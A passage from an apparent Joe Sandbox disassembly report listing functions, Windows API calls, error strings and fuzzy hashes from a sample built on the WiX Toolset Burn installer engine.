                                                                                                                                                                                                                                                                            • API ID: DirectoryErrorLastSystemWindows
                                                                                                                                                                                                                                                                            • String ID: Failed to alloc Windows directory path.$Failed to concat subdirectory on Windows directory path.$Failed to get Windows directory path with default size.$Failed to get Windows directory path with returned size.$Failed to realloc Windows directory path.$Failed to terminate Windows directory path with backslash.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\path2utl.cpp
                                                                                                                                                                                                                                                                            • API String ID: 505562763-519864416
                                                                                                                                                                                                                                                                            • Opcode ID: 59583cd8f04abf657e6300083a1b6209c3de66bf278842b143bb2138c5001a0f
                                                                                                                                                                                                                                                                            • Instruction ID: 7dd28cc58d24c1c9596730136c23cfc2ab743f265e1381d8163dae018b87980d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 59583cd8f04abf657e6300083a1b6209c3de66bf278842b143bb2138c5001a0f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F8411733A80735B7D72157548C4AFAF296CFF41B54F528120FE44BB292E7649D0096E1
                                                                                                                                                                                                                                                                            Function 008E4A25 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 130COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetSystemWow64DirectoryW.KERNEL32(?,00000105,?,00000105), ref: 008E4A67
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008E4A73
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to terminate system wow64 directory path with backslash., xrefs: 008E4B65
                                                                                                                                                                                                                                                                            • Failed to get system wow64 directory path with returned size., xrefs: 008E4B3E
                                                                                                                                                                                                                                                                            • Failed to get max length of input buffer., xrefs: 008E4A4A
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\pathutil.cpp, xrefs: 008E4A97, 008E4A9D, 008E4AAE, 008E4B33, 008E4B38, 008E4B74
                                                                                                                                                                                                                                                                            • Failed to allocate space for system wow64 directory., xrefs: 008E4AC9
                                                                                                                                                                                                                                                                            • Failed to get system wow64 directory path with default size., xrefs: 008E4AA3
                                                                                                                                                                                                                                                                            • Failed to realloc system wow64 directory path., xrefs: 008E4AF0
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: DirectoryErrorLastSystemWow64
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate space for system wow64 directory.$Failed to get max length of input buffer.$Failed to get system wow64 directory path with default size.$Failed to get system wow64 directory path with returned size.$Failed to realloc system wow64 directory path.$Failed to terminate system wow64 directory path with backslash.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\pathutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1255099494-3047029672
                                                                                                                                                                                                                                                                            • Opcode ID: 762aab71758511b5f57915100a47149fdf5e34527ebbd857658a400695f9388e
                                                                                                                                                                                                                                                                            • Instruction ID: 3ac45d42b70d4b1b8c7de5e4f260d405ee18cb87ebdcf48341946a01781050c2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 762aab71758511b5f57915100a47149fdf5e34527ebbd857658a400695f9388e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2731F772A807B673D72156978C4EF5F695CFB83B75F121120BE08FB281E2A4DD0082A9
                                                                                                                                                                                                                                                                            Function 008E48C2 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 128COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 008E4904
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,008E18D8,?,?,00000000,?,?,?,008E18B7,?,?,00000000,00000000), ref: 008E4910
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to terminate system directory path with backslash., xrefs: 008E4A00
                                                                                                                                                                                                                                                                            • Failed to get system directory path with returned size., xrefs: 008E49DA
                                                                                                                                                                                                                                                                            • Failed to allocate space for system directory., xrefs: 008E4966
                                                                                                                                                                                                                                                                            • Failed to get max length of input buffer., xrefs: 008E48E7
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\pathutil.cpp, xrefs: 008E4934, 008E493A, 008E494B, 008E49CF, 008E49D4, 008E4A0F
                                                                                                                                                                                                                                                                            • Failed to get system directory path with default size., xrefs: 008E4940
                                                                                                                                                                                                                                                                            • Failed to realloc system directory path., xrefs: 008E498C
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: DirectoryErrorLastSystem
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate space for system directory.$Failed to get max length of input buffer.$Failed to get system directory path with default size.$Failed to get system directory path with returned size.$Failed to realloc system directory path.$Failed to terminate system directory path with backslash.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\pathutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3081803543-4099084807
                                                                                                                                                                                                                                                                            • Opcode ID: 8740f674ab0ce689832c27c433c433015df89852a0facb883bf3057e2b25806d
                                                                                                                                                                                                                                                                            • Instruction ID: 786fdc32d2f362af7ba5769f55252d6f1cf83dc4667fa2bdc46a7ece93338808
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8740f674ab0ce689832c27c433c433015df89852a0facb883bf3057e2b25806d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 50311A72E803B677E73166568C4AF6F6D5CFB07B64F121130BE04FB2D2E6A49C0081A4
                                                                                                                                                                                                                                                                            Function 008FE1C1 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 117fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,08000000,00000000), ref: 008FE1DE
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008FE1EE
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 008FE305
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                                            • String ID: %ls container from working path '%ls' to path '%ls'$Container has no verification information: %ls$Copying$Failed to open container in working path: %ls$Failed to verify container hash: %ls$Moving$d:\a\wix4\wix4\src\burn\engine\cache.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 2528220319-1647781961
                                                                                                                                                                                                                                                                            • Opcode ID: 4388656c1ac1d3797724858e516b44002e72808b8fac17bb79f945acd0a2f5fc
                                                                                                                                                                                                                                                                            • Instruction ID: e8ea9f773b6511e33b404154911700d5d4ee7c0543843496f8b982494db87adc
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4388656c1ac1d3797724858e516b44002e72808b8fac17bb79f945acd0a2f5fc
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E319C32540219BBEF225E95CC4AFBB3E29FF45B55F110114FF14BA1E1D2B1D82097A5
                                                                                                                                                                                                                                                                            Function 008EB5CF Relevance: 18.2, APIs: 2, Strings: 10, Instructions: 211COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(00000000,00000000,00000000,8000FFFF,0094E7E8,00000000,00000000,00000000,00000000,8000FFFF,?,8000FFFF,8000FFFF,008E6DA2), ref: 008EB5E6
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 008EB83F
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to write variable name., xrefs: 008EB804
                                                                                                                                                                                                                                                                            • Failed to get numeric., xrefs: 008EB7B4
                                                                                                                                                                                                                                                                            • Failed to write variable value type., xrefs: 008EB7F0
                                                                                                                                                                                                                                                                            • Unsupported variable type., xrefs: 008EB784
                                                                                                                                                                                                                                                                            • Failed to get string., xrefs: 008EB7DC
                                                                                                                                                                                                                                                                            • Failed to write variable value as string., xrefs: 008EB7C8
                                                                                                                                                                                                                                                                            • Failed to write variable count., xrefs: 008EB603
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 008EB615, 008EB82A
                                                                                                                                                                                                                                                                            • Failed to write included flag., xrefs: 008EB818
                                                                                                                                                                                                                                                                            • Failed to write variable value as number., xrefs: 008EB7A0
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                            • String ID: Failed to get numeric.$Failed to get string.$Failed to write included flag.$Failed to write variable count.$Failed to write variable name.$Failed to write variable value as number.$Failed to write variable value as string.$Failed to write variable value type.$Unsupported variable type.$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3168844106-3226335872
                                                                                                                                                                                                                                                                            • Opcode ID: 68084b3d4569d39ffc25722726a26d73b7e6b9a8f6a6eb7cea2f9fe4ed0c922b
                                                                                                                                                                                                                                                                            • Instruction ID: 01568d685c4a7fee9e2692f7ca2ff487266c811a356d87436a5ee1eb6cdaddda
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 68084b3d4569d39ffc25722726a26d73b7e6b9a8f6a6eb7cea2f9fe4ed0c922b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B061E331A4036ABBDB22DE96CC46F9B7B68FF46755F104120FA00BA2D1D3B1DE509B91
                                                                                                                                                                                                                                                                            Function 009407B7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 192memoryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Variant$AllocClearInitString
                                                                                                                                                                                                                                                                            • String ID: d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed XmlCreateDocument$failed put_preserveWhiteSpace$failed put_resolveExternals$failed put_validateOnParse$failed to allocate bstr for Path in XmlLoadDocumentFromFileEx$failed to load XML from: %ls
                                                                                                                                                                                                                                                                            • API String ID: 2213243845-3558707546
                                                                                                                                                                                                                                                                            • Opcode ID: 08a6d02b714b9d26b02453345cc258135cbc5fdead422b239f776ea78dcbe31f
                                                                                                                                                                                                                                                                            • Instruction ID: da15da35137e32066c4ad692fba9ed21c08bfb114063084264555ded5655900d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 08a6d02b714b9d26b02453345cc258135cbc5fdead422b239f776ea78dcbe31f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1B511836B40715BBEB15DF64CC4AF5E77A9BFC5B10F058065FA04EB381EAB09A018B91
                                                                                                                                                                                                                                                                            Function 008E774C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 188COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(68056A00,?,00000000,?,008E80B3,?,?,?,?), ref: 008E7792
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00010068,?,00000000,?,008E80B3,?,?,?,?), ref: 008E77A9
                                                                                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(008E876B,?,00000000,?,008E80B3,?,?,?,?), ref: 008E77BC
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(5468FFFF,?,008E80B3,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008E77CF
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(53009525,?,008E80B3,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008E77E6
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(E850C094,008E879F,008E87BB,?,008E80B3,?,?,?,?), ref: 008E7825
                                                                                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(008E817F,008E84EF,008E879F,008E87BB,?,008E80B3,?,?,?,?), ref: 008E7844
                                                                                                                                                                                                                                                                              • Part of subcall function 00939966: LocalFree.KERNEL32(008E7FB7,?,008E7764,d:\a\wix4\wix4\src\burn\engine\variable.cpp,?,00000000,?,008E80B3,?,?,?,?), ref: 00939970
                                                                                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(008E87D7,008E828B,008E80F3,008E829F,008E8293,008E81AB,008E815B,008E8133,008E82C3,008E84D3,008E843B,008E8163,?,008E80B3,?,?), ref: 008E79B6
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseHandle$CriticalDeleteSection$FreeLocal
                                                                                                                                                                                                                                                                            • String ID: d:\a\wix4\wix4\src\burn\engine\variable.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 352808245-2538428059
                                                                                                                                                                                                                                                                            • Opcode ID: 165ad6b3a2d089094a6cfce045c1ddd2681311a92cd3f7bb86ac66ad72b4cfbf
                                                                                                                                                                                                                                                                            • Instruction ID: 34f09aa6879dcf6030fe0017f7bb5654675ceeda79e8d1343b516d370195b0e0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 165ad6b3a2d089094a6cfce045c1ddd2681311a92cd3f7bb86ac66ad72b4cfbf
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8D6153B0A04B85ABCA20FBBAC849E97B3EDFF56340F440819B95AD7111DB34F910DB21
                                                                                                                                                                                                                                                                            Function 009450E2 Relevance: 17.7, APIs: 2, Strings: 8, Instructions: 187registryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00944F04: lstrlenW.KERNEL32(008E7162,008E6DEA,?,?,?,00945488,008E7162,008E6DEA,008E6EC2,008E6DEA,008E6DEA,?,?,?,00900D28,0D8C6817), ref: 00944F2A
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00020019,00000000,008E6CF2,00000000,00000000,00000000), ref: 009452A2
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00020019,00000000,008E6CF2,00000000,00000000,00000000), ref: 009452B5
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to add the dependent key "%ls" to the string array., xrefs: 009452D7
                                                                                                                                                                                                                                                                            • Failed to enumerate the dependents key of "%ls"., xrefs: 009452FF
                                                                                                                                                                                                                                                                            • Failed to check the dictionary of ignored dependents., xrefs: 00945210
                                                                                                                                                                                                                                                                            • Failed to allocate the registry key for dependency "%ls"., xrefs: 00945112
                                                                                                                                                                                                                                                                            • Failed to get the name of the dependent from the key "%ls"., xrefs: 009452EB
                                                                                                                                                                                                                                                                            • Failed to open the registry key for dependents of "%ls"., xrefs: 009451C4
                                                                                                                                                                                                                                                                            • Failed to open the registry key "%ls". The dependency store is corrupt., xrefs: 0094516F
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\deputil.cpp, xrefs: 00945121, 0094521F, 0094530E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close$lstrlen
                                                                                                                                                                                                                                                                            • String ID: Failed to add the dependent key "%ls" to the string array.$Failed to allocate the registry key for dependency "%ls".$Failed to check the dictionary of ignored dependents.$Failed to enumerate the dependents key of "%ls".$Failed to get the name of the dependent from the key "%ls".$Failed to open the registry key "%ls". The dependency store is corrupt.$Failed to open the registry key for dependents of "%ls".$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\deputil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1752758355-2900922597
                                                                                                                                                                                                                                                                            • Opcode ID: 0d4cdfa8f0a13cb1b191dc8039d4d15cf4a83aeff3236b0f725c0ae77177335d
                                                                                                                                                                                                                                                                            • Instruction ID: e20fbceedacefb8f0dcbf9e7dc5312a29f7f710ea713100b149bd942adf2c418
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0d4cdfa8f0a13cb1b191dc8039d4d15cf4a83aeff3236b0f725c0ae77177335d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8851B532D40A29FBEF229AD4CC06FAE7B64AF04B15F124151BA14790E2D3F58E50EB91
                                                                                                                                                                                                                                                                            Function 008E327C Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 169COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000003,?,?,0093A94F,?,?), ref: 008E32DB
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,0093A94F,?,?,00000000,0000FDE9,?,008E7B05,00000003), ref: 008E32E7
                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000003,00000000,?,?,0093A94F,?,00000000,00000000,00000000,00000000,00000003,?,?,0093A94F,?,?), ref: 008E33E6
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,0093A94F,?,?,00000000,0000FDE9,?,008E7B05,00000003), ref: 008E33F0
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ByteCharErrorLastMultiWide
                                                                                                                                                                                                                                                                            • String ID: Not enough memory to allocate string of size: %u$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\strutil.cpp$failed to allocate string, len: %u$failed to convert to ansi: %ls$failed to get required size for conversion to ANSI: %ls$failed to get size of destination string
                                                                                                                                                                                                                                                                            • API String ID: 203985260-2965928106
                                                                                                                                                                                                                                                                            • Opcode ID: c3659930af7f4b5555d0277297e8d14547eabb26f5517ac0889e666a54ac3e75
                                                                                                                                                                                                                                                                            • Instruction ID: 8d4847696e5a4c2c378a5830cdb59991c7f433857c155d1928a484bc9fa9ebdb
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c3659930af7f4b5555d0277297e8d14547eabb26f5517ac0889e666a54ac3e75
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2E513D71640259BFEB214B55DC8EF7F7668FB16755F114228FD01FB2D0EAB09E008660
                                                                                                                                                                                                                                                                            Function 00945753 Relevance: 17.7, APIs: 2, Strings: 8, Instructions: 167registryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00944F04: lstrlenW.KERNEL32(008E7162,008E6DEA,?,?,?,00945488,008E7162,008E6DEA,008E6EC2,008E6DEA,008E6DEA,?,?,?,00900D28,0D8C6817), ref: 00944F2A
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000001,00000000,00000001,00000000,008E6DA2,008E6CF2,00020006,00000000,00000000,00000000,00000001,00000000,008E6DA2,009031C1,00000000,00000000), ref: 009458FE
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(008E6DA2,00000000,00000001,00000000,008E6DA2,008E6CF2,00020006,00000000,00000000,00000000,00000001,00000000,008E6DA2,009031C1,00000000,00000000), ref: 0094591C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to allocate dependent subkey "%ls" under dependency "%ls"., xrefs: 009457FF
                                                                                                                                                                                                                                                                            • Failed to set the %ls registry value to "%ls"., xrefs: 00945874, 009458A5
                                                                                                                                                                                                                                                                            • Failed to create the dependency subkey "%ls"., xrefs: 00945833
                                                                                                                                                                                                                                                                            • Failed to create the dependency registry key "%ls"., xrefs: 009457C8
                                                                                                                                                                                                                                                                            • Failed to allocate the registry key for dependency "%ls"., xrefs: 00945781
                                                                                                                                                                                                                                                                            • %ls\%ls, xrefs: 009457E5
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\deputil.cpp, xrefs: 00945790, 00945842, 009458E8
                                                                                                                                                                                                                                                                            • Failed to set the %ls registry value to %d., xrefs: 009458D9
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
